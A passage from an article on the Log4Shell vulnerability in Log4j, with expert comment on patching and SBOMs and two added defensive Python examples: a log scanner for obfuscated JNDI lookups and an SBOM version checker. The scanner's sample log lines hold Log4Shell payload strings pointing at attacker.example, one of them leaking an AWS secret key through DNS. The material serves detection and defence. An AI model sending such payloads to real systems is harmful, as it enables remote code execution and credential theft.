News of the exploit, soon called Log4Shell, quickly spread. Early reports emerged of servers running the game Minecraft being compromised. It quickly became clear, however, that the exploit was widespread and that it would affect many more popular applications and technology tools beyond games.
“We expect the vulnerability to be widely exploited by sophisticated actors and we have limited time to take necessary steps in order to reduce the likelihood of damage,” Easterly said of the flaw.
Why Are These Vulnerabilities Harmful for Businesses?
Part of the challenge with Log4j is that the flaw lies in a feature of the library itself: Log4j interprets certain patterns inside the strings it logs, and its lookup feature can be pointed at a directory (JNDI) server that the attacker controls. Any input that ends up in a log message, such as a username, a browser's user-agent header or a chat line, can therefore carry instructions to the server. The attacker needs no credentials; they only need to get their string logged. Those who attacked Minecraft servers, for example, were able to execute their own code simply by pasting the string into the game's chat.
Combine this with the large number of systems that have shipped with Log4j over the years, some of them connected devices that are no longer actively maintained, and you suddenly have a widespread problem.
The Apache Software Foundation has since released a series of patches; it took more than one release to close the hole, because the first fix was itself found to be incomplete. But because Log4j is bundled inside so many other products, many deployments of the library will prove hard to update.
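Because many deployments cannot be patched quickly, defenders need to know whether the lookup strings described above are arriving in their logs. The following is an added example, not code from the article or from the Log4j project: a small scanner that undoes the obfuscations attackers commonly wrap around the lookup (nested ${lower:...}, ${upper:...} and ${...:-default} forms) before checking for a JNDI lookup. The access-log lines, the attacker.example hostname and the 10.0.0.x addresses are constructed for the illustration; the resolver only models the handful of lookups used for obfuscation, which is enough for detection but is not a reimplementation of Log4j.

```python
import re

# Constructed sample access-log lines (not captured from any real system). The
# fourth line shows the variant that tries to exfiltrate an environment variable
# through the DNS name it makes the server resolve.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:13:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:13:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:13:01:11 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://attacker.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:13:01:12 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.attacker.example/c}"',
    '10.0.0.12 - - [10/Dec/2021:13:02:00 +0000] "GET /pricing?plan=${price} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

# Innermost Log4j lookup: a ${...} whose body contains no further braces.
_INNER = re.compile(r"\$\{([^{}]*)\}")


def _resolve(body: str) -> str:
    """Evaluate one non-nested lookup body the way an attacker relies on Log4j doing it.

    Only the lookups commonly used for obfuscation are modelled (lower, upper and the
    ':-default' fallback); anything else is left as bare text so the scan terminates.
    """
    prefix, _, rest = body.partition(":")
    if prefix.lower() == "lower":
        return rest.split(":-", 1)[0].lower()
    if prefix.lower() == "upper":
        return rest.split(":-", 1)[0].upper()
    if ":-" in body:
        # ${::-j} or ${env:UNSET_VAR:-j}: the variable is empty, so the default text wins
        return body.split(":-", 1)[1]
    # ${env:HOME}, ${sys:user.name}, ${price}: keep the name, drop the wrapper
    return rest or prefix


def find_jndi_lookup(line: str, max_rounds: int = 64):
    """Return the de-obfuscated ${jndi:...} lookup found in `line`, or None."""
    text = line
    for _ in range(max_rounds):
        m = _INNER.search(text)
        if m is None:
            return None
        body = m.group(1)
        if body[:5].lower() == "jndi:":
            return "${jndi:" + body[5:] + "}"
        # Replace the innermost lookup with its value and look again, outward.
        text = text[: m.start()] + _resolve(body) + text[m.end():]
    return None


def scan(lines):
    """Return (line_number, normalized_lookup) for every line carrying a JNDI lookup."""
    return [(i, hit) for i, line in enumerate(lines, 1) if (hit := find_jndi_lookup(line))]


if __name__ == "__main__":
    for number, lookup in scan(SAMPLE_LOG_LINES):
        print(f"line {number}: {lookup}")
```

The scanner works inside out: each innermost ${...} is replaced by the text Log4j would substitute for it, which is what turns ${${lower:j}ndi:...} back into ${jndi:...}. A legitimate unresolved lookup such as ${price} is left alone and not flagged. Run it over the fields you actually log (user-agent, username, chat messages) rather than only the request path, since the flaw triggers on whatever reaches the logger.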
William Malik, vice president of infrastructure strategies at Trend Micro, says that this incident reinforces the need to triage such situations to minimize the impact of the problem.
“Obviously, if it’s broken and you’re being exploited, then you do one of three things: You turn off logging; you apply whatever patch is available as quickly as possible; or you back things up and keep rolling with as much instrumentation and observation as possible, so you know what steps you took once you discovered there was a problem.”
More broadly, he says, a more fundamental approach needs to be considered.
How Can Businesses Protect Themselves Against More Vulnerabilities?
There are two important strategies to keep in mind when trying to manage exposure to software vulnerabilities. The first is getting an accurate inventory of what software actually runs in your infrastructure, including the libraries buried inside it.
The increased use of open-source software, Log4j among many other examples, has underscored the need for a software bill of materials (SBOM), an ingredient list of the components each piece of software is built from. CISA and other federal agencies have made a push to see these broadly implemented in the wake of Log4Shell and the recent wave of supply chain attacks.
Malik notes this is an important concept worth striving for, but says it is not an easy thing to implement on its own.
“You’ve got to know what you’re cooking with,” he says. “And the biggest challenge is to get that up to date and reoccurring, which is hard. I’m not throwing a rocket at anybody who hasn’t got this thing nailed down, because very few do — it’s a hard problem.”
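What an SBOM buys you in an incident like this is a query you can run instead of a hunt. The following is an added example, not code from the article or from any SBOM tool: it reads a bill of materials in CycloneDX JSON form and reports every log4j-core component, including copies nested inside other artifacts, that falls below a version floor you set as policy. The SBOM itself, the billing-api application and the com.example vendor agent are constructed for the illustration; the version floor of 2.17.1 is the release at which the December 2021 run of Log4j 2 security fixes ended, but the check treats it as a policy input you should set yourself.

```python
import json
import re

# Constructed sample SBOM in CycloneDX JSON form; the application and the
# com.example artifact are made up for this illustration.
SAMPLE_SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "metadata": {"component": {"type": "application", "name": "billing-api", "version": "3.2.0"}},
    "components": [
        {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core", "version": "2.14.1",
         "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"},
        {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-api", "version": "2.14.1",
         "purl": "pkg:maven/org.apache.logging.log4j/log4j-api@2.14.1"},
        # A vendor agent that bundles its own, much older copy of log4j-core as a nested component.
        {"type": "library", "group": "com.example", "name": "legacy-agent", "version": "1.0",
         "components": [
             {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core", "version": "2.0-beta9"},
         ]},
        {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core", "version": "2.17.1"},
        # Log4j 1.x is a separate, end-of-life code line and is outside this check's scope.
        {"type": "library", "group": "log4j", "name": "log4j", "version": "1.2.17"},
    ],
})

# Policy input, keyed by (group, name): the lowest version you accept in production.
# 2.17.1 is where the December 2021 run of Log4j 2 security releases ended; set it per your own policy.
VERSION_FLOOR = {("org.apache.logging.log4j", "log4j-core"): "2.17.1"}

_VER = re.compile(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?(?:[-.]?(.*))?$")


def version_key(version: str) -> tuple:
    """Sortable key for Maven-style versions; a pre-release (2.0-beta9) sorts before 2.0."""
    m = _VER.match(version.strip())
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    numbers = tuple(int(part or 0) for part in m.group(1, 2, 3))
    pre = m.group(4) or ""
    return numbers + ((-1, pre) if pre else (0, ""))


def walk(components, path=()):
    """Depth-first over CycloneDX components, descending into components nested inside others."""
    for comp in components or []:
        here = path + (f"{comp.get('group', '')}:{comp.get('name', '')}@{comp.get('version', '')}",)
        yield comp, here
        yield from walk(comp.get("components"), here)


def find_below_floor(sbom_json: str, floors=VERSION_FLOOR):
    """Return every component in the SBOM that sits below its policy floor, with its nesting path."""
    sbom = json.loads(sbom_json)
    findings = []
    for comp, path in walk(sbom.get("components")):
        key = (comp.get("group"), comp.get("name"))
        if key in floors and version_key(comp["version"]) < version_key(floors[key]):
            findings.append({
                "component": f"{key[0]}:{key[1]}",
                "version": comp["version"],
                "minimum": floors[key],
                "path": " -> ".join(path),
            })
    return findings


if __name__ == "__main__":
    for f in find_below_floor(SAMPLE_SBOM):
        print(f"{f['component']} {f['version']} < {f['minimum']}  via {f['path']}")
```

Two details matter in practice. Matching is on the exact group and artifact name, so log4j-api (which does not contain the vulnerable code) and the unrelated Log4j 1.x artifact are not reported, while the copy of log4j-core hidden inside the vendor agent is. And the result is only as good as the SBOM: a bill of materials that was generated once and never regenerated will not show the agent you installed last month, which is the "up to date and reoccurring" problem Malik describes.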
The second strategy is more complicated to implement but could limit the damage from wide-reaching exploits. It involves building a security framework that contains incidents like the zero-day scramble that followed the Log4Shell disclosure, so that a single flaw does not become a company-wide fire.